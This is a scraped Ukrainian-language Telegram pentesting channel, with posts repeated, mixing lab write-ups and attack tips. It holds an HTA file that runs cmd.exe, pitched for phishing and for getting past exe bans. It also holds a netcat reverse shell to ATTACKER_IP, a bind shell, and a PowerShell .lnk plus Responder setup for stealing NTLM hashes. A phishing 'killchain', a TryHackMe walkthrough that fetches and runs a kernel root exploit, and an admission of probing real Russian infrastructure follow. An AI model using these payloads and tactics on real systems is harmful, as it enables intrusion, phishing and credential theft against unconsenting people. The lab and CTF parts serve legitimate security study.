Стосовно thm
Проходжу модуль по c2(command and control)
І піднімається там один цікавий метод(а може і не один) ховання malicious трафіку. C2 Profiles.
Суть:
Ви запустили сервак, https, і ваш малварь шле туди запити для виконування команд. Їх ловить soc команда. Звісно через те що трафік https - бачить тільки куди запити йдуть. Умовний pillows.com. І всім соком йдуть туди, шерстять ваш сайт, але там тільки подушки...
Чому? Тому що ваш сайт налаштований reverse proxy чи ще чимось таким, віддавати malware трафік тільки користувачам, які вказали умовний хедер
Не маєш такого хедера - купуєш подушки, маєш - шлеш команди і отримуєш вивід.
GL
Проходжу модуль по c2(command and control)
І піднімається там один цікавий метод(а може і не один) ховання malicious трафіку. C2 Profiles.
Суть:
Ви запустили сервак, https, і ваш малварь шле туди запити для виконування команд. Їх ловить soc команда. Звісно через те що трафік https - бачить тільки куди запити йдуть. Умовний pillows.com. І всім соком йдуть туди, шерстять ваш сайт, але там тільки подушки...
Чому? Тому що ваш сайт налаштований reverse proxy чи ще чимось таким, віддавати malware трафік тільки користувачам, які вказали умовний хедер
Sezam: Open
Не маєш такого хедера - купуєш подушки, маєш - шлеш команди і отримуєш вивід.
GL
❤3👍1
А ми створимо свій HTML, з блек джеком, мамзельками і виконуванням системних команд!
Ніколи не виникало відчуття, що в html сторінках не вистачає шарму? Емоцій? A little bit of SPICE.
Прошу любити і шанувати, формат HTA - прикол від майкрософта, який дозволяє і html рендерити і скріпти виконувати
Варіант байпасу заборон на exe файли, плюс, наскільки бачу, дефендер не ругається. Плюс підійде для фішингу не дуже вумних. Всі знають що exe запускати не можна, про hta ж не говорили?
Ніколи не виникало відчуття, що в html сторінках не вистачає шарму? Емоцій? A little bit of SPICE.
Прошу любити і шанувати, формат HTA - прикол від майкрософта, який дозволяє і html рендерити і скріпти виконувати
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Варіант байпасу заборон на exe файли, плюс, наскільки бачу, дефендер не ругається. Плюс підійде для фішингу не дуже вумних. Всі знають що exe запускати не можна, про hta ж не говорили?
❤3
Привіт шановні. Терпіти не можу лагучий шматок лайна на Телеграфі, але люто хочу вставляти скріншоти. Тому спробую в медіум. Відкритий до пропозицій. З плюсів - можна використати прев'ю телеграму для цього всього.
https://medium.com/@BezPC/insecure-shop-start-hardcoded-credentials-fd5a804697d5
https://medium.com/@BezPC/insecure-shop-start-hardcoded-credentials-fd5a804697d5
Medium
Insecure Shop: Start(Hardcoded Credentials)
BezPC
❤2
Продовужую цикл по мобілкам. Сьогодні глибше
https://medium.com/@BezPC/insecure-shop-insufficient-url-validation-156560164f98
https://medium.com/@BezPC/insecure-shop-insufficient-url-validation-156560164f98
Medium
Insecure Shop: Insufficient URL Validation
Сьогодні, шановні, будемо говорити про важчі речі ніж у минулій статті. Але важкі часи формують сильних людей.
Початком нашої подорожі буде…
Початком нашої подорожі буде…
❤3👍2🔥1
Думаю бачили таку команду і певне юзали на CTF?
Я, як багато із вас просто копіпастив, не дуже розбираючись, що воно робить. Реверс шел є реверс шел.
Але сьогодні розберу:
Це просто видалення файлу /tmp/f якщо він існує(тому що ми будемо такий же створювати, і щоб не мати проблем)
Це якраз те створення файлу. А файл - іменована пайпа, по факту буфер обміну для ваших процесів
Читаємо її вміст
І передаємо в sh(shell) в інтерактивному режимі. А 2>&1 - редірект виводу помилок(2) в стандартний вивід(1)
А це відкриває сесію неткату до атакуючого хоста, і його вміст записує до файлу /tmp/f
І цикл замикається - ми пишемо до пайпи, вона пише нам, і по кругу. Сподіваюсь, стало легше для розуміння.
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f
Я, як багато із вас просто копіпастив, не дуже розбираючись, що воно робить. Реверс шел є реверс шел.
Але сьогодні розберу:
rm -f /tmp/f;
Це просто видалення файлу /tmp/f якщо він існує(тому що ми будемо такий же створювати, і щоб не мати проблем)
mkfifo /tmp/f;
Це якраз те створення файлу. А файл - іменована пайпа, по факту буфер обміну для ваших процесів
cat /tmp/f
Читаємо її вміст
sh -i 2>&1
І передаємо в sh(shell) в інтерактивному режимі. А 2>&1 - редірект виводу помилок(2) в стандартний вивід(1)
nc ATTACKER_IP ATTACKER_PORT >/tmp/f
А це відкриває сесію неткату до атакуючого хоста, і його вміст записує до файлу /tmp/f
І цикл замикається - ми пишемо до пайпи, вона пише нам, і по кругу. Сподіваюсь, стало легше для розуміння.
👍2❤1
До речі bind shell - буквально все те ж, тільки слухає вже жертва
І відповідно вивід баша передається на слухаюче підключення
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f
І відповідно вивід баша передається на слухаюче підключення
nc -l 0.0.0.0 8080
❤1
Добрий вечір хлібороби
Продовжую в мобілки. На POC для цієї поїботи я витратив 8 годин. Попрошу почитати і поширити.
https://medium.com/@BezPC/insecure-shop-arbitrary-code-execution-7067f4315f87
Продовжую в мобілки. На POC для цієї поїботи я витратив 8 годин. Попрошу почитати і поширити.
https://medium.com/@BezPC/insecure-shop-arbitrary-code-execution-7067f4315f87
Medium
Insecure Shop: Arbitrary Code Execution
Боже, як же я заї6ався роблячи POC для цього експлойта! Але все по порядку. Як і в попередніх вразливостях — знаходимо проблему в коді. В…
❤4
Ранку, шановні!
Написав це в статті, але не всі(нажаль) читають. З Різдвом всіх причетних!
Спокою в сімейному колі і безпеки для близьких 🧑🎄☃️🎄❄️
А я, тим часом знову вгівні мобілках, сьогодні про активності і їх приватність. Гарного перегляду!
https://medium.com/@BezPC/insecure-shop-intent-redirection-access-to-protected-components-d008c1883bb1
Написав це в статті, але не всі(нажаль) читають. З Різдвом всіх причетних!
Спокою в сімейному колі і безпеки для близьких 🧑🎄☃️🎄❄️
А я, тим часом знову в
https://medium.com/@BezPC/insecure-shop-intent-redirection-access-to-protected-components-d008c1883bb1
Medium
Insecure Shop: Intent Redirection (Access to Protected Components)
Привіт, хлібороби!
Вітаю з Різдвом всіх причетних. Jinja bells!
А сьогодні на столі препарації — Intent Redirection (Access to Protected…
Вітаю з Різдвом всіх причетних. Jinja bells!
А сьогодні на столі препарації — Intent Redirection (Access to Protected…
❤7
Заглиблюємося! 🌊🌊🌊🌊
(Постараюсь далі щось інше)
А зараз - мобілки, цього разу - викрадання файлів з апки, яка пише бекапи в спільні папки. Здається тут легко для розуміння. Всі питання в коменти, всім продуктивного дня
https://medium.com/@BezPC/insecure-shop-theft-of-arbitrary-files-from-local-storage-49cdb6c6e07f
(Постараюсь далі щось інше)
А зараз - мобілки, цього разу - викрадання файлів з апки, яка пише бекапи в спільні папки. Здається тут легко для розуміння. Всі питання в коменти, всім продуктивного дня
https://medium.com/@BezPC/insecure-shop-theft-of-arbitrary-files-from-local-storage-49cdb6c6e07f
Medium
Insecure Shop: Theft of Arbitrary files from Local Storage
Deeper, deeper!
Вітаю в продовженні мобільних вразливостей на прикладі стендового apk InsecureShop. Сьогодні на столі викрадення файлів…
Вітаю в продовженні мобільних вразливостей на прикладі стендового apk InsecureShop. Сьогодні на столі викрадення файлів…
❤5👍2🔥1
Хо -Хо-Хотілося б привітати вас шановні. В прийдешньому році бажаю сил і наснаги. Треба рухатися, бо ніхто крім нас цього не зробить. Бажаю надійних і головне розуміючих людей поруч. Бажаю відчути що все на своїх місцях.
Тим кому важко - не киснути, це ділу не допомагає. "Що всратися й сидіти?"
І кожеш фініш це по суті старт ☃️
Сумбурно написав. День цей я провів в потугах побороти синдром самозванця. Тикався в баг баунті(засабмітив info disclosure, може похвалять) і за порадою одного з амбасадорів цього каналу, тикнувся в російську інфру. Якась газета локальна також приєднується до привітань.
З вірою у світле майбутнє, BezPC
Тим кому важко - не киснути, це ділу не допомагає.
І кожеш фініш це по суті старт ☃️
Сумбурно написав. День цей я провів в потугах побороти синдром самозванця. Тикався в баг баунті(засабмітив info disclosure, може похвалять) і за порадою одного з амбасадорів цього каналу, тикнувся в російську інфру. Якась газета локальна також приєднується до привітань.
З вірою у світле майбутнє, BezPC
❤7
Що таке любов? Любов - це чекати скільки треба. Чи то чекати поки вона обере річ в магазині, чи то поки набрутиться хеш, чи то поки напише статтю шикарний техноблогер🫀 - все це любов. Дякую всім хто чекав, люблю вас. За цей період я встиг непогано похворіти, знайти нову роботу. У вирі подій не забував про вас!🫀🫀🫀
Ще пройшов курс по малварь аналізу, для загального ознайомлення піде.
Накачав піратських книжечок(дайте знати і кину). В одній з них, по пентесту AD був наведений приклад з використанням SCF файлу. Але атака не актуальна для 10 вінди. Але чатгпт порадив сучасний аналог - через link(.lnk) файл. Суть наступна:
Ми проламали базовий захист і маємо доступ на запис до шари. Якоїсь максимально спільної, на яку бухгалтери записують документи. Можна звісно накидати туди "ЗапустиМене.exe", але є трошки елегантніший спосіб. Відразу попереджу, що працює рідко, бо треба зловити адміна, який вимкнув налаштування безпеки smb вінди, але спробувати можна.
Ще пройшов курс по малварь аналізу, для загального ознайомлення піде.
Накачав піратських книжечок(дайте знати і кину). В одній з них, по пентесту AD був наведений приклад з використанням SCF файлу. Але атака не актуальна для 10 вінди. Але чатгпт порадив сучасний аналог - через link(.lnk) файл. Суть наступна:
Ми проламали базовий захист і маємо доступ на запис до шари. Якоїсь максимально спільної, на яку бухгалтери записують документи. Можна звісно накидати туди "ЗапустиМене.exe", але є трошки елегантніший спосіб. Відразу попереджу, що працює рідко, бо треба зловити адміна, який вимкнув налаштування безпеки smb вінди, але спробувати можна.
❤5👍1😍1
Ми створюємо .lnk файл, який робимо посиланням на нашу шару. І якщо в адміна, або іншого користувача вимкнені механізми захисту(так часом роблять, тестувальники і тд) то ми ловимо його NTLM хеш, який далі можна брутити, або використовувати в атаці Pass the Hash.
Реалізація:
1. Створюємо ярлик(можна в себе, потім закинете)
2. Запускаємо імпакет або респондер
3. Чекаємо!
Прикол в тому, що для того аби підвантажити зображення іконки нашого ресурсу - вінда буде надсилати автентифіковані запити, з хешем і користувачем, навіть якщо він не відкривав наш ярлик. І якщо зорі на нашій стороні - отримуємо те що ви бачите на скріні.
Реалізація:
1. Створюємо ярлик(можна в себе, потім закинете)
$ShortcutPath = "C:\path\to\your\attack.lnk"
$TargetPath = "\\attacker_ip\path\to\responder.exe"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutPath)
$Shortcut.TargetPath = $TargetPath
$Shortcut.Save()
2. Запускаємо імпакет або респондер
sudo impacket-smbserver -smb2support share .
3. Чекаємо!
Прикол в тому, що для того аби підвантажити зображення іконки нашого ресурсу - вінда буде надсилати автентифіковані запити, з хешем і користувачем, навіть якщо він не відкривав наш ярлик. І якщо зорі на нашій стороні - отримуємо те що ви бачите на скріні.
❤4👍1😍1
Привіт!
Продовжуючи тему попереднього відоса - атаки на AD. Найбазовіше, що радять робити як тільки потрапляєш в мережу - запускати responder. Що ж це таке? Це тулза яка спеціалізується на атаках типу LLMNR/NBT-NS/MDNS poisoning. Суть атаки: клієнт хоче підключитися до шари по хостнейму, типу MyPC, але випадково натискає не ту клавішу і шукає вже MyPCC. І логічно - не знаходить. Тоді, в потугах останньої надії він надсилає мультикаст запит всім-всім в мережі. "А чи не знає ніхто хто такий MyPCC?". І зазвичай ніхто не знає. А ми знаємо, ми все знаємо!
І відповідь завжди одна - я. Я MyPCC, я PussyDestroyer2017, я IronMan. Ми відповідаємо абсолютно на всі запити собою. Нащо? А бо далі, клієнт нам повірить і почне авторизацію, надсилаючи свої авторизаційні дані, хеш паролю, юзернейм і тд. А нам лишається тільки набрутити його пароль офлайн.
Продовжуючи тему попереднього відоса - атаки на AD. Найбазовіше, що радять робити як тільки потрапляєш в мережу - запускати responder. Що ж це таке? Це тулза яка спеціалізується на атаках типу LLMNR/NBT-NS/MDNS poisoning. Суть атаки: клієнт хоче підключитися до шари по хостнейму, типу MyPC, але випадково натискає не ту клавішу і шукає вже MyPCC. І логічно - не знаходить. Тоді, в потугах останньої надії він надсилає мультикаст запит всім-всім в мережі. "А чи не знає ніхто хто такий MyPCC?". І зазвичай ніхто не знає. А ми знаємо, ми все знаємо!
І відповідь завжди одна - я. Я MyPCC, я PussyDestroyer2017, я IronMan. Ми відповідаємо абсолютно на всі запити собою. Нащо? А бо далі, клієнт нам повірить і почне авторизацію, надсилаючи свої авторизаційні дані, хеш паролю, юзернейм і тд. А нам лишається тільки набрутити його пароль офлайн.
❤5
Ще, окрім варіанту містайпу назви шари, є варіант з HTML документом. Протестовано на останній версії вінди.
Ти отримуєш контент за допомогою тегів iframe/img і src вказаним у форматі
(обов'язково без доменного імені/білого айпі, бо піде по мережі)
В такому випадку вінда шукає шару, на якій цей файл і відповідно шле preauth. Тому як killchain від bezpc:
1. Проникаємо в мережу якимось вебшелом чи просто в рамках пентесту.
2. Вмикаємо Responder
3. Шлемо користувачам лист з url, на сервак який ми контролюємо(можна, наприклад webhooks)
4. Користувачі, або навіть команда безпеки(при аналізі) переходить по url
5. Ловимо хеші і користувачів.
Попрошу лайк за геніальність))
Ти отримуєш контент за допомогою тегів iframe/img і src вказаним у форматі
file://bezpk/share/
(обов'язково без доменного імені/білого айпі, бо піде по мережі)
В такому випадку вінда шукає шару, на якій цей файл і відповідно шле preauth. Тому як killchain від bezpc:
1. Проникаємо в мережу якимось вебшелом чи просто в рамках пентесту.
2. Вмикаємо Responder
3. Шлемо користувачам лист з url, на сервак який ми контролюємо(можна, наприклад webhooks)
4. Користувачі, або навіть команда безпеки(при аналізі) переходить по url
5. Ловимо хеші і користувачів.
Попрошу лайк за геніальність))
❤6
SnortCheatsheet-TryHackMe-1647343678716.pdf
601.8 KB
Snort - IPS/IDS, штука що детектить патерни в трафіку і або блокує, або алертить аналітикам. Ось вам пам'ятка з THM
❤4
0day: THM Write-Up
Exploiting Ubuntu via ShellShock and OverlayFS Vulnerability
Привіт, шановні пан-крипкери та ентузіасти пентесту! Сьогодні ми розберемо цікавий челендж з TryHackMe під назвою "0day". Ця машина демонструє класичні вразливості в Ubuntu, які дозволяють отримати повний контроль над системою. Готуйтеся до черепашок, кролячих нор та ядерних експлойтів!
(посилання на кімнату: https://tryhackme.com/room/0day)
🔍 Phase 1: Reconnaissance
Наш перший крок - зрозуміти, з чим ми маємо справу. Запускаємо nmap сканування:
nmap -sC -sV -v $IP
Результати:
Port 22/tcp: OpenSSH 6.6.1p1 (Ubuntu) - стара версія, варто запам'ятати
Port 80/tcp: Apache 2.4.7 (Ubuntu) - головна ціль для атаки
Далі використовуємо feroxbuster для знаходження прихованих директорій:
(feroxbuster — це інструмент для швидкого виявлення директорій та файлів на веб-серверах через форсований перебір шляхів із словників.)
feroxbuster -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Цікаві знахідки:
/secret/turtle.png — черепашка? Спочатку я не зрозумів, що це, проте пошук у Google та підказки від ChatGPT вказали на явний натяк на ShellShock!
(https://beaglesecurity.com/blog/vulnerability/shellshock-bash-bug.html)
/cgi-bin/ - потенційний вектор атаки ShellShock
/backup/ - містить зашифрований RSA ключ, цікаво?)
🔑 Phase 2: Initial Access
The Rabbit Hole (RSA Key)
У директорії /backup знаходимо зашифрований приватний ключ. Спробуємо його розшифрувати:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4, ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2V...
-----END RSA PRIVATE KEY-----
/usr/share/john/ssh2john.py id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Отримуємо пароль без відповідного користувача - це класична "кроляча нора". Не витрачаємо час і рухаємось далі!
ShellShock Exploitation
Черепаха в /secret - це явний натяк на CVE-2014-6271 (ShellShock).
(ShellShock — це критична вразливість у Bash (CVE-2014-6271), яка дозволяє віддалено виконувати довільний код на сервері через спеціально сформовані змінні середовища.
Простими словами:
Bash неправильно обробляє змінні середовища.
Якщо в певному CGI-скрипті (/cgi-bin/) можна вставити шкідливу команду в заголовок запиту (наприклад, в User-Agent чи Cookie), то сервер виконає цю команду замість простої обробки змінної.)
Використовуємо Metasploit: (можна також через git clone https://github.com/nccgroup/shocker.git)
msfconsole
use exploit/multi/HTTP/apache_mod_cgi_bash_env_exec
set RHOSTS $IP
set TARGETURI /cgi-bin/test.cgi
set LHOST $YOURIP
exploit
Boom! Отримуємо Meterpreter сесію (www-data). Перший прапорець вже наш:
cat /home/user/user.txt
THM{Sh3llSh0ck_r0ckz}
📌 Phase 3: Privilege Escalation
Kernel Exploitation
Перевіряємо версію ядра:
uname -a
Linux 0day 3.19.0-25-generic #26~14.04.1-Ubuntu SMP ...
Знаходимо вразливість CVE-2015-1328 (overlayfs)
(https://www.exploit-db.com/exploits/40688).
CVE-2015-1328 — вразливість в OverlayFS у Linux до 3.19.0-25, яка дозволяє локальному користувачу через некоректне монтування змінити системні файли й отримати root-доступ; наприклад, можна змонтувати каталог /tmp поверх /etc і підмінити passwd для ескалації привілеїв.Використовуємо готовий експлойт:
( або ж далі metasploit linux/local/overlayfs_priv_esc)
searchsploit overlayfs
# Завантажуємо експлойт на машину
wget http://$YOURIP/37292.c -O /tmp/exploit.c
gcc exploit.c -o exploit
chmod +x exploit
python -m http.server
Переходимо на вразливий сервер і вводимо команду
wget http://$YOURIP/exploit
./exploit
Root acquired! Отримуємо останній прапорець:
cat /root/root.txt
THM{g00d_j0b_0day_is_Pleased}
Exploiting Ubuntu via ShellShock and OverlayFS Vulnerability
Привіт, шановні пан-крипкери та ентузіасти пентесту! Сьогодні ми розберемо цікавий челендж з TryHackMe під назвою "0day". Ця машина демонструє класичні вразливості в Ubuntu, які дозволяють отримати повний контроль над системою. Готуйтеся до черепашок, кролячих нор та ядерних експлойтів!
(посилання на кімнату: https://tryhackme.com/room/0day)
🔍 Phase 1: Reconnaissance
Наш перший крок - зрозуміти, з чим ми маємо справу. Запускаємо nmap сканування:
nmap -sC -sV -v $IP
Результати:
Port 22/tcp: OpenSSH 6.6.1p1 (Ubuntu) - стара версія, варто запам'ятати
Port 80/tcp: Apache 2.4.7 (Ubuntu) - головна ціль для атаки
Далі використовуємо feroxbuster для знаходження прихованих директорій:
(feroxbuster — це інструмент для швидкого виявлення директорій та файлів на веб-серверах через форсований перебір шляхів із словників.)
feroxbuster -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Цікаві знахідки:
/secret/turtle.png — черепашка? Спочатку я не зрозумів, що це, проте пошук у Google та підказки від ChatGPT вказали на явний натяк на ShellShock!
(https://beaglesecurity.com/blog/vulnerability/shellshock-bash-bug.html)
/cgi-bin/ - потенційний вектор атаки ShellShock
/backup/ - містить зашифрований RSA ключ, цікаво?)
🔑 Phase 2: Initial Access
The Rabbit Hole (RSA Key)
У директорії /backup знаходимо зашифрований приватний ключ. Спробуємо його розшифрувати:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4, ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2V...
-----END RSA PRIVATE KEY-----
/usr/share/john/ssh2john.py id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Отримуємо пароль без відповідного користувача - це класична "кроляча нора". Не витрачаємо час і рухаємось далі!
ShellShock Exploitation
Черепаха в /secret - це явний натяк на CVE-2014-6271 (ShellShock).
(ShellShock — це критична вразливість у Bash (CVE-2014-6271), яка дозволяє віддалено виконувати довільний код на сервері через спеціально сформовані змінні середовища.
Простими словами:
Bash неправильно обробляє змінні середовища.
Якщо в певному CGI-скрипті (/cgi-bin/) можна вставити шкідливу команду в заголовок запиту (наприклад, в User-Agent чи Cookie), то сервер виконає цю команду замість простої обробки змінної.)
Використовуємо Metasploit: (можна також через git clone https://github.com/nccgroup/shocker.git)
msfconsole
use exploit/multi/HTTP/apache_mod_cgi_bash_env_exec
set RHOSTS $IP
set TARGETURI /cgi-bin/test.cgi
set LHOST $YOURIP
exploit
Boom! Отримуємо Meterpreter сесію (www-data). Перший прапорець вже наш:
cat /home/user/user.txt
THM{Sh3llSh0ck_r0ckz}
📌 Phase 3: Privilege Escalation
Kernel Exploitation
Перевіряємо версію ядра:
uname -a
Linux 0day 3.19.0-25-generic #26~14.04.1-Ubuntu SMP ...
Знаходимо вразливість CVE-2015-1328 (overlayfs)
(https://www.exploit-db.com/exploits/40688).
CVE-2015-1328 — вразливість в OverlayFS у Linux до 3.19.0-25, яка дозволяє локальному користувачу через некоректне монтування змінити системні файли й отримати root-доступ; наприклад, можна змонтувати каталог /tmp поверх /etc і підмінити passwd для ескалації привілеїв.Використовуємо готовий експлойт:
( або ж далі metasploit linux/local/overlayfs_priv_esc)
searchsploit overlayfs
# Завантажуємо експлойт на машину
wget http://$YOURIP/37292.c -O /tmp/exploit.c
gcc exploit.c -o exploit
chmod +x exploit
python -m http.server
Переходимо на вразливий сервер і вводимо команду
wget http://$YOURIP/exploit
./exploit
Root acquired! Отримуємо останній прапорець:
cat /root/root.txt
THM{g00d_j0b_0day_is_Pleased}
❤3